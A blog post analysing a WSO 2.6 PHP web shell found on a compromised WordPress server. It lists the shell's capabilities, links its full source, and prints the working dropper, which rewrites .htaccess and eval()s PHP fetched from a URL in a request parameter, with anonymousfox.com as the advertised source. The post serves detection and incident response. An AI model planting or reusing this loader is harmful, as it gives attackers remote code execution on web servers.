⚠️ WSO 2.6 Shell 😲

March 6, 2021cPanel Linux WordPress

WSO (web shell by oRb) is a simple and easy to use tool for any would-be hacker to learn and use.

This shell allows an attacker to perform the following actions:

View detailed server information
File management (uploading, downloading, editing files, etc.)
Command-line console
RunSQL queries
Execute PHP code
Text encode and decode
Brute-force attack remote FTP and database servers
Installation of a Perl script to act as a more direct backdoor on the server
Self-remove option to remove the script after running

At the moment of writing this article (February 2021) ConfigServer eXploit Scanner (cxs) does NOT detect the WSO Shell version 2.6 – but only version 2.0.

Here is a list of all the files that were created and/or modified by this shell in my case. If you’ve detected this shell on your server, make sure to check the following files and directories as found in this Github repo.

Source code of the WSO 2.6 Shell

link: https://gist.github.com/stefanpejcic/7e86d1d91740059c38aa4bbeff23b830

And in my case, it was executed using the following code:

<?php error_reporting(0); @ini_set('error_log', NULL); @ini_set('log_errors', 0); @ini_set('display_errors', 0); $root = $_SERVER['DOCUMENT_ROOT']; $htaccess = base64_decode("IyBCRUdJTgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleC5waHAkIC0gW0xdClJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1mClJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kClJld3JpdGVSdWxlIC4gaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgojIEVORAo="); if(file_exists("$root/wp-config.php") && file_exists("$root/.htaccess")){ unlink("$root/.htaccess"); if(function_exists('file_put_contents')) { file_put_contents("$root/.htaccess",$htaccess); }else{ fwrite(fopen("$root/.htaccess","w"),$htaccess);} }elseif(file_exists("$root/configuration.php") && file_exists("$root/.htaccess")){ unlink("$root/.htaccess"); if(function_exists('file_put_contents')) { file_put_contents("$root/.htaccess",$htaccess); }else{ fwrite(fopen("$root/.htaccess","w"),$htaccess); } } if(file_exists("$root/.user.ini")){ unlink("$root/.user.ini"); }  echo "FoxAutoV5 [The best tool] , Download => anonymousfox.com\n"; $code = $_GET["php"]; if (empty($code) or !stristr($code, "http")){ exit; } else { $php=file_get_contents($code); if (empty($php)){ $php = curl($code); } $php=str_replace("<?php", "", $php); $php=str_replace("<?php", "", $php); $php=str_replace("?>", "", $php); eval($php); } function curl($url) { $curl = curl_init(); curl_setopt($curl, CURLOPT_TIMEOUT, 40); curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, TRUE); if (stristr($url,"https://")) { curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); } curl_setopt($curl, CURLOPT_HEADER, false); return curl_exec ($curl); } ?>

As we can see from the source code above, the script simply creates a new .htaccexx file and connects to anonymousfox.com to run a code from that domain, but if visited directly without a password simply states FoxAutoV5 [The best tool] , Download => anonymousfox.com

The domain anonymousfox.com is a well-known domain used for malware distribution. Over the years I have filed multiple reports to GoDaddy regarding the malware hosted there, but never got any response.

The base64 code is simply content of the .htaccess file: